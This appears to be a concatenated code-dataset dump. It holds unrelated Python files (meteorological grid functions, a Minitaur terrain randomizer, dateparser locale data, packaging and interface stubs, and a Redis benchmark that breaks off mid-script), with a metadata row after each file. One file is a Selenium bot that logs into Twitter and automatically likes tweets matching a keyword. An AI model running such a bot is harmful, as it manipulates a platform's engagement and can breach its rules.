    Apply a Cressman smoothing to the grid points.  The smoothed value
    is given by a weighted average of surrounding grid points.  D is
    the radius of influence in grid increments,
    increasing D increases the smoothing. (default D=2)
    </div>
    """
    return GridUtil.smooth(S, "CRES", int(D))

def dvdx(V):
    """ Partial x derivative of a vector
    <div class=jython>
    DVDX ( V ) = [ DDX (u), DDX (v) ]
    </div>
    """
    return vecr(ddx(ur(V)), ddx(vr(V)))

def dvdy(V):
    """ Partial y derivative of a vector
    <div class=jython>
    DVDY ( V ) = [ DDY (u), DDY (v) ]
    </div>
    """
    return vecr(ddy(ur(V)), ddy(vr(V)))
def frnt(S,V):
    """ Frontogenesis function from theta and the wind
    <div class=jython>
    FRNT ( THTA, V ) = 1/2 * MAG ( GRAD (THTA) ) *
                       ( DEF * COS (2 * BETA) - DIV ) <p>
    Where: BETA = ASIN ( (-DDX (THTA) * COS (PSI) <br>
                          - DDY (THTA) * SIN (PSI))/ <br>
                          MAG ( GRAD (THTA) ) ) <br>
           PSI  = 1/2 ATAN2 ( SHR / STR ) <br>
    </div>
    """
    shear = shr(V)
    strch = strd(V)
    psi = .5*atn2(shear,strch)
    dxt = ddx(S)
    dyt = ddy(S)
    cosd = cos(psi)
    sind = sin(psi)
    gradt = grad(S)
    mgradt = mag(gradt)
    a = -cosd*dxt-sind*dyt
    beta = asin(a/mgradt)
    frnto = .5*mgradt*(defr(V)*cos(2*beta)-div(V))
    return frnto

def geo(z):
    """ geostrophic wind from height
    <div class=jython>
    GEO ( S ) = [ - DDY (S) * const / CORL, DDX (S) * const / CORL ]
    </div>
    """
    return DerivedGridFactory.createGeostrophicWindVector(z)

def grad(S):
    """ Gradient of a scalar
    <div class=jython>
    GRAD ( S ) = [ DDX ( S ), DDY ( S ) ]
    </div>
    """
    return vecr(ddx(S),ddy(S))

def gwfv(V, N=6):
    """
    <div class=jython>
    Horizontal smoothing using normally distributed weights
    with theoretical response of 1/e for N * delta-x wave.
    Increasing N increases the smoothing. (default N=6)
    </div>
    """
    return gwfs(V, N)

def inad(V1,V2):
    """ Inertial advective wind
    <div class=jython>
    INAD ( V1, V2 ) = [ DOT ( V1, GRAD (u2) ),
                        DOT ( V1, GRAD (v2) ) ]
    </div>
    """
    return vecr(dot(V1,grad(ur(V2))),dot(V1,grad(vr(V2))))
def qvec(S,V):
    """ Q-vector at a level ( K / m / s )
    <div class=jython>
    QVEC ( S, V ) = [ - ( DOT ( DVDX (V), GRAD (S) ) ),
                      - ( DOT ( DVDY (V), GRAD (S) ) ) ]
    where S can be any thermal parameter, usually THTA.
    </div>
    """
    grads = grad(S)
    qvecu = newName(-dot(dvdx(V),grads),"qvecu")
    qvecv = newName(-dot(dvdy(V),grads),"qvecv")
    return vecr(qvecu,qvecv)

def qvcl(THTA,V):
    """ Q-vector ( K / m / s )
    <div class=jython>
    QVCL ( THTA, V ) = ( 1/( D (THTA) / DP ) ) *
                       [ ( DOT ( DVDX (V), GRAD (THTA) ) ),
                         ( DOT ( DVDY (V), GRAD (THTA) ) ) ]
    </div>
    """
    dtdp = GridMath.partial(THTA,2)
    gradt = grad(THTA)
    qvecudp = newName(quo(dot(dvdx(V),gradt),dtdp),"qvecudp")
    qvecvdp = newName(quo(dot(dvdy(V),gradt),dtdp),"qvecvdp")
    return vecr(qvecudp,qvecvdp)

def rectv(S, D=2):
    """
    <div class=jython>
    Apply a rectangular aperture smoothing to the grid points.  The weighting
    function is the product of the rectangular aperture diffraction function
    in the x and y directions.  D is the radius of influence in grid
    increments, increasing D increases the smoothing. (default D=2)
    </div>
    """
    return GridUtil.smooth(S, "RECT", int(D))

def sm5v(V):
    """ Smooth a vector grid using a 5-point smoother (see sm5s)
    """
    return sm5s(V)

def sm9v(V):
    """ Smooth a vector grid using a 9-point smoother (see sm9s)
    """
    return sm9s(V)
def thrm(S, level1, level2, unit=None):
    """ Thermal wind
    <div class=jython>
    THRM ( S ) = [ u (GEO(S)) (level1) - u (GEO(S)) (level2),
                   v (GEO(S)) (level1) - v (GEO(S)) (level2) ]
    </div>
    """
    return vldf(geo(S),level1,level2, unit)

def vadd(V1,V2):
    """ add the components of 2 vectors
    <div class=jython>
    VADD (V1, V2) = [ u1+u2, v1+v2 ]
    </div>
    """
    return add(V1,V2)

def vecn(S1,S2):
    """ Make a true north vector from two components
    <div class=jython>
    VECN ( S1, S2 ) = [ S1, S2 ]
    </div>
    """
    return makeTrueVector(S1,S2)

def vecr(S1,S2):
    """ Make a vector from two components
    <div class=jython>
    VECR ( S1, S2 ) = [ S1, S2 ]
    </div>
    """
    return makeVector(S1,S2)

def vlav(V,level1,level2, unit=None):
    """ calculate the vector layer average
    <div class=jython>
    VLAV(V) = [(u(level1) + u(level2))/2,
               (v(level1) + v(level2))/2]
    </div>
    """
    return layerAverage(V, level1, level2, unit)

def vldf(V,level1,level2, unit=None):
    """ calculate the vector layer difference
    <div class=jython>
    VLDF(V) = [u(level1) - u(level2),
               v(level1) - v(level2)]
    </div>
    """
    return layerDiff(V,level1,level2, unit)

def vmul(V1,V2):
    """ Multiply the components of 2 vectors
    <div class=jython>
    VMUL (V1, V2) = [ u1*u2, v1*v2 ]
    </div>
    """
    return mul(V1,V2)

def vquo(V1,V2):
    """ Divide the components of 2 vectors
    <div class=jython>
    VQUO (V1, V2) = [ u1/u2, v1/v2 ]
    </div>
    """
    return quo(V1,V2)

def vsub(V1,V2):
    """ subtract the components of 2 vectors
    <div class=jython>
    VSUB (V1, V2) = [ u1-u2, v1-v2 ]
    </div>
    """
    return sub(V1,V2)
def LPIndex(u, v, z, t, top, bottom, unit):
    """ calculate the LP index from the wind shear between discrete layers
    <div class=jython>
    LP = 7.268DUDZ + 0.718DTDN + 0.318DUDN - 2.52
    </div>
    """
    Z = windShear(u, v, z, top, bottom, unit)*7.268
    uwind = getSliceAtLevel(u, top)
    vwind = getSliceAtLevel(v, top)
    temp = newUnit(getSliceAtLevel(t, top), "temperature", "celsius")
    HT = sqrt(ddx(temp)*ddx(temp) + ddy(temp)*ddy(temp))*0.718
    HU = (ddx(vwind) + ddy(uwind))*0.318
    L = add(noUnit(Z), add(noUnit(HU), noUnit(HT)))
    L = (L - 2.520)*(-0.59)
    P = 1.0/(1.0 + GridMath.applyFunctionOverGridsExt(L,"exp"))
    LP = setLevel(P, top, unit)
    return LP

def EllrodIndex(u, v, z, top, bottom, unit):
    """ calculate the Ellrod index from the wind shear between discrete layers
    <div class=jython>
    EI = VWS X ( DEF + DIV )
    </div>
    """
    VWS = windShear(u, v, z, top, bottom, unit)*100.0
    #
    uwind = getSliceAtLevel(u, top)
    vwind = getSliceAtLevel(v, top)
    DIV = (ddx(uwind) + ddy(vwind))* (-1.0)
    #
    DSH = ddx(vwind) + ddy(uwind)
    DST = ddx(uwind) - ddy(vwind)
    DEF = sqrt(DSH * DSH + DST * DST)
    EI = mul(noUnit(VWS), add(noUnit(DEF), noUnit(DIV)))
    return setLevel(EI, top, unit)
| 26.75461 | 89 | 0.584721 | 2,684 | 18,862 | 4.100596 | 0.152385 | 0.044339 | 0.077594 | 0.018808 | 0.494821 | 0.429675 | 0.404052 | 0.350809 | 0.320462 | 0.276576 | 0 | 0.024786 | 0.264182 | 18,862 | 704 | 90 | 26.792614 | 0.768211 | 0.590658 | 0 | 0.078431 | 0 | 0 | 0.012306 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.382353 | false | 0 | 0 | 0 | 0.77451 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
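The `sm5s` function in the record above delegates to `GridUtil.smooth`, but its docstring gives the full 5-point formula. As a standalone illustration of that formula only (the helper name `sm5s_plain` and the list-of-lists grid representation are assumptions, not part of the IDV API):

```python
# Plain-Python sketch of the 5-point smoother quoted in sm5s():
# SM5S(S) = .5*S(i,j) + .125*(S(i+1,j) + S(i,j+1) + S(i-1,j) + S(i,j-1)).
# Grid edges are left unsmoothed for simplicity.
def sm5s_plain(grid):
    rows, cols = len(grid), len(grid[0])
    out = [row[:] for row in grid]  # copy so edges keep their original values
    for i in range(1, rows - 1):
        for j in range(1, cols - 1):
            out[i][j] = (0.5 * grid[i][j] +
                         0.125 * (grid[i + 1][j] + grid[i][j + 1] +
                                  grid[i - 1][j] + grid[i][j - 1]))
    return out
```

A uniform grid is a fixed point of the smoother (0.5 + 4 * 0.125 = 1), while an isolated spike is halved, which is the expected low-pass behavior.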
d5effb4acc4b4904be8e5099e47cd060230843fe | 2,376 | py | Python | app.py | DevilBit/Twitter-Bot | 6f1b285aeb5faf37906d575775a927e69a5321d6 | [
"MIT"
] | null | null | null | app.py | DevilBit/Twitter-Bot | 6f1b285aeb5faf37906d575775a927e69a5321d6 | [
"MIT"
] | null | null | null | app.py | DevilBit/Twitter-Bot | 6f1b285aeb5faf37906d575775a927e69a5321d6 | [
"MIT"
] | 1 | 2021-03-08T20:05:23.000Z | 2021-03-08T20:05:23.000Z | from selenium import webdriver #to get the browser
from selenium.webdriver.common.keys import Keys  # to send keys to the browser
import getpass  # to get the password safely
import time  # to pause the program


# a class to store all Twitter-related objects and functions
class twitter_bot:
    def __init__(self, username, password):
        self.username = username
        self.password = password
        self.bot = webdriver.Firefox()

    # login function
    def login(self):
        bot = self.bot
        bot.get('https://twitter.com/login')
        # sleep to wait for the browser to get the website
        time.sleep(3)
        email = bot.find_element_by_class_name('js-username-field')  # get the email field
        password = bot.find_element_by_class_name('js-password-field')  # get the password field
        # clear the email and password fields just in case of autofill
        email.clear()
        password.clear()
        # fill in the email field
        email.send_keys(self.username)
        time.sleep(2)
        # fill in the password field
        password.send_keys(self.password)
        time.sleep(2)
        # click the login button
        bot.find_element_by_class_name("EdgeButtom--medium").click()
        time.sleep(3)

    def like_tweet(self, search):
        bot = self.bot
        # use the keyword to search
        bot.get('https://twitter.com/search?q=' + search + '&src=typd')
        bot.implicitly_wait(3)
        # scroll to load posts
        for i in range(0, 30):
            bot.execute_script('window.scrollTo(0, document.body.scrollHeight)')
            time.sleep(10)
        tweets = bot.find_elements_by_class_name('tweet')
        links = [element.get_attribute('data-permalink-path') for element in tweets]
        # like posts
        for link in links:
            bot.get('https://twitter.com/' + link)
            try:
                bot.find_element_by_class_name('HeartAnimation').click()
                time.sleep(10)
            except Exception as ex:
                time.sleep(60)


if __name__ == '__main__':
    username = input('Email: ')
    password = getpass.getpass('Password: ')
    search = input('Please enter keyword: ')
    user = twitter_bot(username, password)
    user.login()
    time.sleep(10)
    user.like_tweet(search)
| 34.941176 | 95 | 0.603114 | 295 | 2,376 | 4.718644 | 0.359322 | 0.051724 | 0.039511 | 0.045977 | 0.119971 | 0.074713 | 0.038793 | 0 | 0 | 0 | 0 | 0.010241 | 0.301347 | 2,376 | 67 | 96 | 35.462687 | 0.828313 | 0.170875 | 0 | 0.191489 | 0 | 0 | 0.140964 | 0.014308 | 0 | 0 | 0 | 0 | 0 | 1 | 0.06383 | false | 0.170213 | 0.085106 | 0 | 0.170213 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 |
d5f33371ef4b57ee6f5f8e58e37840bbabd0819e | 10,275 | py | Python | examples/pybullet/gym/pybullet_envs/minitaur/envs/env_randomizers/minitaur_terrain_randomizer.py | felipeek/bullet3 | 6a59241074720e9df119f2f86bc01765917feb1e | [
"Zlib"
] | 9,136 | 2015-01-02T00:41:45.000Z | 2022-03-31T15:30:02.000Z | examples/pybullet/gym/pybullet_envs/minitaur/envs/env_randomizers/minitaur_terrain_randomizer.py | felipeek/bullet3 | 6a59241074720e9df119f2f86bc01765917feb1e | [
"Zlib"
] | 2,424 | 2015-01-05T08:55:58.000Z | 2022-03-30T19:34:55.000Z | examples/pybullet/gym/pybullet_envs/minitaur/envs/env_randomizers/minitaur_terrain_randomizer.py | felipeek/bullet3 | 6a59241074720e9df119f2f86bc01765917feb1e | [
"Zlib"
] | 2,921 | 2015-01-02T10:19:30.000Z | 2022-03-31T02:48:42.000Z | """Generates a random terrain at Minitaur gym environment reset."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import os, inspect
currentdir = os.path.dirname(os.path.abspath(inspect.getfile(inspect.currentframe())))
parentdir = os.path.dirname(os.path.dirname(currentdir))
parentdir = os.path.dirname(os.path.dirname(parentdir))
os.sys.path.insert(0, parentdir)
import itertools
import math
import enum
import numpy as np
from pybullet_envs.minitaur.envs import env_randomizer_base
_GRID_LENGTH = 15
_GRID_WIDTH = 10
_MAX_SAMPLE_SIZE = 30
_MIN_BLOCK_DISTANCE = 0.7
_MAX_BLOCK_LENGTH = _MIN_BLOCK_DISTANCE
_MIN_BLOCK_LENGTH = _MAX_BLOCK_LENGTH / 2
_MAX_BLOCK_HEIGHT = 0.05
_MIN_BLOCK_HEIGHT = _MAX_BLOCK_HEIGHT / 2
class PoissonDisc2D(object):
"""Generates 2D points using Poisson disk sampling method.
Implements the algorithm described in:
http://www.cs.ubc.ca/~rbridson/docs/bridson-siggraph07-poissondisk.pdf
Unlike the uniform sampling method that creates small clusters of points,
Poisson disk method enforces the minimum distance between points and is more
suitable for generating a spatial distribution of non-overlapping objects.
"""
  def __init__(self, grid_length, grid_width, min_radius, max_sample_size):
    """Initializes the algorithm.

    Args:
      grid_length: The length of the bounding square in which points are
        sampled.
      grid_width: The width of the bounding square in which points are
        sampled.
      min_radius: The minimum distance between any pair of points.
      max_sample_size: The maximum number of sample points around an active site.
        See details in the algorithm description.
    """
    self._cell_length = min_radius / math.sqrt(2)
    self._grid_length = grid_length
    self._grid_width = grid_width
    self._grid_size_x = int(grid_length / self._cell_length) + 1
    self._grid_size_y = int(grid_width / self._cell_length) + 1
    self._min_radius = min_radius
    self._max_sample_size = max_sample_size

    # Flatten the 2D grid as a 1D array. The grid is used for fast nearest
    # point searching.
    self._grid = [None] * self._grid_size_x * self._grid_size_y

    # Generate the first sample point and set it as an active site.
    first_sample = np.array(np.random.random_sample(2)) * [grid_length, grid_width]
    self._active_list = [first_sample]

    # Also store the sample point in the grid.
    self._grid[self._point_to_index_1d(first_sample)] = first_sample
  def _point_to_index_1d(self, point):
    """Computes the index of a point in the grid array.

    Args:
      point: A 2D point described by its coordinates (x, y).

    Returns:
      The index of the point within the self._grid array.
    """
    return self._index_2d_to_1d(self._point_to_index_2d(point))

  def _point_to_index_2d(self, point):
    """Computes the 2D index (aka cell ID) of a point in the grid.

    Args:
      point: A 2D point (list) described by its coordinates (x, y).

    Returns:
      x_index: The x index of the cell the point belongs to.
      y_index: The y index of the cell the point belongs to.
    """
    x_index = int(point[0] / self._cell_length)
    y_index = int(point[1] / self._cell_length)
    return x_index, y_index

  def _index_2d_to_1d(self, index2d):
    """Converts the 2D index to the 1D position in the grid array.

    Args:
      index2d: The 2D index of a point (aka the cell ID) in the grid.

    Returns:
      The 1D position of the cell within the self._grid array.
    """
    return index2d[0] + index2d[1] * self._grid_size_x

  def _is_in_grid(self, point):
    """Checks if the point is inside the grid boundary.

    Args:
      point: A 2D point (list) described by its coordinates (x, y).

    Returns:
      Whether the point is inside the grid.
    """
    return (0 <= point[0] < self._grid_length) and (0 <= point[1] < self._grid_width)

  def _is_in_range(self, index2d):
    """Checks if the cell ID is within the grid.

    Args:
      index2d: The 2D index of a point (aka the cell ID) in the grid.

    Returns:
      Whether the cell (2D index) is inside the grid.
    """
    return (0 <= index2d[0] < self._grid_size_x) and (0 <= index2d[1] < self._grid_size_y)
  def _is_close_to_existing_points(self, point):
    """Checks if the point is close to any already sampled (and stored) points.

    Args:
      point: A 2D point (list) described by its coordinates (x, y).

    Returns:
      True iff the distance of the point to any existing points is smaller than
      the min_radius.
    """
    px, py = self._point_to_index_2d(point)
    # Now we can check nearby cells for existing points
    for neighbor_cell in itertools.product(range(px - 1, px + 2), range(py - 1, py + 2)):

      if not self._is_in_range(neighbor_cell):
        continue

      maybe_a_point = self._grid[self._index_2d_to_1d(neighbor_cell)]
      if maybe_a_point is not None and np.linalg.norm(maybe_a_point - point) < self._min_radius:
        return True

    return False

  def sample(self):
    """Samples new points around some existing point.

    Removes the sampling base point and also stores the new sampled points if
    they are far enough from all existing points.
    """
    active_point = self._active_list.pop()
    for _ in range(self._max_sample_size):
      # Generate random points near the current active_point between the radius
      random_radius = np.random.uniform(self._min_radius, 2 * self._min_radius)
      random_angle = np.random.uniform(0, 2 * math.pi)

      # The sampled 2D points near the active point
      sample = random_radius * np.array([np.cos(random_angle),
                                         np.sin(random_angle)]) + active_point

      if not self._is_in_grid(sample):
        continue

      if self._is_close_to_existing_points(sample):
        continue

      self._active_list.append(sample)
      self._grid[self._point_to_index_1d(sample)] = sample

  def generate(self):
    """Generates the Poisson disc distribution of 2D points.

    Although the while loop looks scary, the algorithm is in fact O(N), where N
    is the number of cells within the grid. When we sample around a base point
    (in some base cell), new points will not be pushed into the base cell
    because of the minimum distance constraint. Once the current base point is
    removed, all future searches cannot start from within the same base cell.

    Returns:
      All sampled points. The points are inside the square [0, grid_length] x
      [0, grid_width].
    """
    while self._active_list:
      self.sample()

    all_sites = []
    for p in self._grid:
      if p is not None:
        all_sites.append(p)

    return all_sites
class TerrainType(enum.Enum):
  """The randomized terrain types we can use in the gym env."""
  RANDOM_BLOCKS = 1
  TRIANGLE_MESH = 2
class MinitaurTerrainRandomizer(env_randomizer_base.EnvRandomizerBase):
"""Generates an uneven terrain in the gym env."""
def __init__(self,
terrain_type=TerrainType.TRIANGLE_MESH,
mesh_filename="robotics/reinforcement_learning/minitaur/envs/testdata/"
"triangle_mesh_terrain/terrain9735.obj",
mesh_scale=None):
"""Initializes the randomizer.
Args:
terrain_type: Whether to generate random blocks or load a triangle mesh.
mesh_filename: The mesh file to be used. The mesh will only be loaded if
terrain_type is set to TerrainType.TRIANGLE_MESH.
mesh_scale: the scaling factor for the triangles in the mesh file.
"""
self._terrain_type = terrain_type
self._mesh_filename = mesh_filename
self._mesh_scale = mesh_scale if mesh_scale else [1.0, 1.0, 0.3]
def randomize_env(self, env):
"""Generate a random terrain for the current env.
Args:
env: A minitaur gym environment.
"""
if self._terrain_type is TerrainType.TRIANGLE_MESH:
self._load_triangle_mesh(env)
if self._terrain_type is TerrainType.RANDOM_BLOCKS:
self._generate_convex_blocks(env)
def _load_triangle_mesh(self, env):
"""Represents the random terrain using a triangle mesh.
It is possible for Minitaur leg to stuck at the common edge of two triangle
pieces. To prevent this from happening, we recommend using hard contacts
(or high stiffness values) for Minitaur foot in sim.
Args:
env: A minitaur gym environment.
"""
env.pybullet_client.removeBody(env.ground_id)
terrain_collision_shape_id = env.pybullet_client.createCollisionShape(
shapeType=env.pybullet_client.GEOM_MESH,
fileName=self._mesh_filename,
flags=1,
meshScale=self._mesh_scale)
env.ground_id = env.pybullet_client.createMultiBody(
baseMass=0, baseCollisionShapeIndex=terrain_collision_shape_id, basePosition=[0, 0, 0])
def _generate_convex_blocks(self, env):
"""Adds random convex blocks to the flat ground.
We use the Possion disk algorithm to add some random blocks on the ground.
Possion disk algorithm sets the minimum distance between two sampling
points, thus voiding the clustering effect in uniform N-D distribution.
Args:
env: A minitaur gym environment.
"""
poisson_disc = PoissonDisc2D(_GRID_LENGTH, _GRID_WIDTH, _MIN_BLOCK_DISTANCE, _MAX_SAMPLE_SIZE)
block_centers = poisson_disc.generate()
for center in block_centers:
# We want the blocks to be in front of the robot.
shifted_center = np.array(center) - [2, _GRID_WIDTH / 2]
# Do not place blocks near the point [0, 0], where the robot will start.
if abs(shifted_center[0]) < 1.0 and abs(shifted_center[1]) < 1.0:
continue
half_length = np.random.uniform(_MIN_BLOCK_LENGTH, _MAX_BLOCK_LENGTH) / (2 * math.sqrt(2))
half_height = np.random.uniform(_MIN_BLOCK_HEIGHT, _MAX_BLOCK_HEIGHT) / 2
box_id = env.pybullet_client.createCollisionShape(
env.pybullet_client.GEOM_BOX, halfExtents=[half_length, half_length, half_height])
env.pybullet_client.createMultiBody(
baseMass=0,
baseCollisionShapeIndex=box_id,
basePosition=[shifted_center[0], shifted_center[1], half_height])
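The `PoissonDisc2D` sampler used above is defined elsewhere in this module. As a rough illustration of the idea — enforcing a minimum spacing between samples — here is a naive dart-throwing sketch; `poisson_disc_naive` is a hypothetical stand-in, not the module's implementation:

```python
import math
import random


def poisson_disc_naive(width, length, min_distance, max_samples):
    """Naive dart-throwing Poisson disc sampler: draw uniform candidates and
    reject any that fall within min_distance of an already accepted point."""
    points = []
    attempts = 0
    while len(points) < max_samples and attempts < 10000:
        attempts += 1
        candidate = (random.uniform(0, width), random.uniform(0, length))
        if all(math.hypot(candidate[0] - p[0], candidate[1] - p[1]) >= min_distance
               for p in points):
            points.append(candidate)
    return points
```

Production samplers (like Bridson's algorithm) avoid the quadratic rejection test with a background grid, but the acceptance criterion is the same.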
| 35.309278 | 98 | 0.706667 | 1,519 | 10,275 | 4.553654 | 0.21264 | 0.021975 | 0.013156 | 0.007518 | 0.237675 | 0.183895 | 0.127078 | 0.061443 | 0.052479 | 0.040335 | 0 | 0.013917 | 0.21674 | 10,275 | 290 | 99 | 35.431034 | 0.845552 | 0.42219 | 0 | 0.034188 | 1 | 0 | 0.016667 | 0.016667 | 0 | 0 | 0 | 0 | 0 | 1 | 0.111111 | false | 0 | 0.076923 | 0 | 0.299145 | 0.008547 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
d5fb061a3a4378d9720ff3a451d5983678f6ed08 | 2,712 | py | Python | venv/lib/python3.8/site-packages/dateparser/data/date_translation_data/ebu.py | yuta-komura/vishnu | 67173b674d5f4f3be189474103612447ef69ab44 | [
"MIT"
] | 1 | 2021-11-17T04:55:14.000Z | 2021-11-17T04:55:14.000Z | dateparser/data/date_translation_data/ebu.py | cool-RR/dateparser | c38336df521cc57d947dc2c9111539a72f801652 | [
"BSD-3-Clause"
] | null | null | null | dateparser/data/date_translation_data/ebu.py | cool-RR/dateparser | c38336df521cc57d947dc2c9111539a72f801652 | [
"BSD-3-Clause"
] | null | null | null | # -*- coding: utf-8 -*-
info = {
"name": "ebu",
"date_order": "DMY",
"january": [
"mweri wa mbere",
"mbe"
],
"february": [
"mweri wa kaĩri",
"kai"
],
"march": [
"mweri wa kathatũ",
"kat"
],
"april": [
"mweri wa kana",
"kan"
],
"may": [
"mweri wa gatano",
"gat"
],
"june": [
"mweri wa gatantatũ",
"gan"
],
"july": [
"mweri wa mũgwanja",
"mug"
],
"august": [
"mweri wa kanana",
"knn"
],
"september": [
"mweri wa kenda",
"ken"
],
"october": [
"mweri wa ikũmi",
"iku"
],
"november": [
"mweri wa ikũmi na ũmwe",
"imw"
],
"december": [
"mweri wa ikũmi na kaĩrĩ",
"igi"
],
"monday": [
"njumatatu",
"tat"
],
"tuesday": [
"njumaine",
"ine"
],
"wednesday": [
"njumatano",
"tan"
],
"thursday": [
"aramithi",
"arm"
],
"friday": [
"njumaa",
"maa"
],
"saturday": [
"njumamothii",
"nmm"
],
"sunday": [
"kiumia",
"kma"
],
"am": [
"ki"
],
"pm": [
"ut"
],
"year": [
"mwaka"
],
"month": [
"mweri"
],
"week": [
"kiumia"
],
"day": [
"mũthenya"
],
"hour": [
"ithaa"
],
"minute": [
"ndagĩka"
],
"second": [
"sekondi"
],
"relative-type": {
"1 year ago": [
"last year"
],
"0 year ago": [
"this year"
],
"in 1 year": [
"next year"
],
"1 month ago": [
"last month"
],
"0 month ago": [
"this month"
],
"in 1 month": [
"next month"
],
"1 week ago": [
"last week"
],
"0 week ago": [
"this week"
],
"in 1 week": [
"next week"
],
"1 day ago": [
"ĩgoro"
],
"0 day ago": [
"ũmũnthĩ"
],
"in 1 day": [
"rũciũ"
],
"0 hour ago": [
"this hour"
],
"0 minute ago": [
"this minute"
],
"0 second ago": [
"now"
]
},
"locale_specific": {},
"skip": [
" ",
".",
",",
";",
"-",
"/",
"'",
"|",
"@",
"[",
"]",
","
]
}
| 15.859649 | 34 | 0.289823 | 188 | 2,712 | 4.170213 | 0.537234 | 0.107143 | 0.045918 | 0.035714 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.012559 | 0.530236 | 2,712 | 170 | 35 | 15.952941 | 0.602826 | 0.007743 | 0 | 0.248521 | 0 | 0 | 0.31759 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
d5fcff660972d9337742f70ae81e7f0f26eaadac | 310 | py | Python | setup.py | martinfarrow/awspk | c3b5f8ede44ca96473b95f52ddb2291a45828565 | [
"MIT"
] | null | null | null | setup.py | martinfarrow/awspk | c3b5f8ede44ca96473b95f52ddb2291a45828565 | [
"MIT"
] | null | null | null | setup.py | martinfarrow/awspk | c3b5f8ede44ca96473b95f52ddb2291a45828565 | [
"MIT"
] | null | null | null | #!/usr/bin/env python3
from setuptools import setup, find_packages
setup(
    name='awspk',
    version='0.1',
    description='An aws cli pen knife with loads of interesting stuff',
    author='Martin Farrow',
    author_email='awspk@dibley.net',
    py_modules=['awspk'],
    license='LICENSE',
)
| 23.846154 | 71 | 0.651613 | 40 | 310 | 4.975 | 0.875 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.012346 | 0.216129 | 310 | 12 | 72 | 25.833333 | 0.806584 | 0.067742 | 0 | 0 | 0 | 0 | 0.34375 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0.111111 | 0 | 0.111111 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
d5fe5092d56595790c2072c2485827d644f9fbac | 1,104 | py | Python | NetCatKS/DProtocol/api/interfaces/subscribers/__init__.py | dimddev/NetCatKS-CP | 2d9e72b2422e344569fd4eb154866b98e9707561 | [
"BSD-2-Clause"
] | null | null | null | NetCatKS/DProtocol/api/interfaces/subscribers/__init__.py | dimddev/NetCatKS-CP | 2d9e72b2422e344569fd4eb154866b98e9707561 | [
"BSD-2-Clause"
] | null | null | null | NetCatKS/DProtocol/api/interfaces/subscribers/__init__.py | dimddev/NetCatKS-CP | 2d9e72b2422e344569fd4eb154866b98e9707561 | [
"BSD-2-Clause"
] | null | null | null | __author__ = 'dimd'
from zope.interface import Interface, Attribute
class IBaseResourceSubscriber(Interface):
    """
    IBaseResourceSubscriber provides functionality for comparison of the signature of
    an incoming request against a candidate DProtocol implementation registered as
    IJSONResource.

    The `adapter` is our first argument in the constructor. It's used by the adapter
    pattern and has to be of type IJSONResource.

    The `protocol` attribute is designed to be provided by classes which implement
    IJSONResourceSubscriber, or inherit from DProtocolSubscriber. If a subclass does
    not provide the protocol argument, an AttributeError will be raised.
    """

    adapter = Attribute("The implementer has to provide an implementation of IJSONResource")
    protocol = Attribute("DProtocol instance")

    def compare():
        """
        Designed to compare the adapter and the DProtocol signature,
        checking whether the signatures are equal
        """


class IJSONResourceSubscriber(Interface):
    """
    """


class IXMLResourceSubscriber(Interface):
    """
    """
9104fd2a412765ae4aa352d6517c087a930d10a7 | 2,304 | py | Python | Extras/benchmark/simple-benchmark.py | yunhaom94/redis-writeanywhere | 1fefed820811fb89585b2b153d916c3b0fa507a6 | [
"BSD-3-Clause"
] | null | null | null | Extras/benchmark/simple-benchmark.py | yunhaom94/redis-writeanywhere | 1fefed820811fb89585b2b153d916c3b0fa507a6 | [
"BSD-3-Clause"
] | null | null | null | Extras/benchmark/simple-benchmark.py | yunhaom94/redis-writeanywhere | 1fefed820811fb89585b2b153d916c3b0fa507a6 | [
"BSD-3-Clause"
] | null | null | null | #!/usr/bin/python3
import random
import string
import time
import subprocess
import os
import redis
import threading
def generate_string(string_size, size, dict):
    '''
    https://stackoverflow.com/questions/16308989/fastest-method-to-generate-big-random-string-with-lower-latin-letters
    '''
    for i in range(size):
        min_lc = ord(b'a')
        len_lc = 26
        key = bytearray(random.getrandbits(8 * string_size).to_bytes(string_size, 'big'))
        for i, b in enumerate(key):
            key[i] = min_lc + b % len_lc  # convert 0..255 to 97..122
        key = key.decode()
        val = key
        dict[key] = val


if __name__ == "__main__":
    size = 1000  # TODO: make this a command line argument
    port = 7000
    FNULL = open(os.devnull, 'w')
    string_size = 100000
    partition = int(size / 4)

    print("generating test sets")
    d1 = {}
    d2 = {}
    d3 = {}
    d4 = {}

    t1 = threading.Thread(target=generate_string, args=(string_size, partition, d1))
    t2 = threading.Thread(target=generate_string, args=(string_size, partition, d2))
    t3 = threading.Thread(target=generate_string, args=(string_size, partition, d3))
